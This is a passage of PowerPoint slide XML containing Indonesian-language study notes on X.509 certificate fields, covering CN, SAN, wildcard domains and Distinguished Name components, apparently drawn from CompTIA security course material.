              <a:t> CN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyulitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peramban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menafsirkannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>benar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Akibatnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekarang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memvalidasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perlu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diselesaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ekstensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alternatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (SAN) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disusun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mewakili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> FQDN dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SAN, browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memvalidasinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengabaikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. Masih </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>meletakkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> FQDN di CN juga, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>peramban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>implementasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mengikuti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SAN juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mewakili</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> subdomain yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> www.comptia.org dan members.comptia.org. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mencantumkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> subdomain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> subdomain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterbitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Domain wildcard, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> *.comptia.org, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikeluarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>induk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> valid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> subdomain (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> level).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kolom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> (O), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> Onit (OU), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Lokalitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> (L), Negara Bagian (ST), dan Negara (C). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>digabungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> nama </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>membentuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> Distinguished Name (DN). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, DN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> LLC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>CN = www.example.com, OU = Web Hosting, O = Example LLC, L = Chicago, ST = Illinois, C = AS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Jenis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>selain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>identifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> server/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. Akun </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
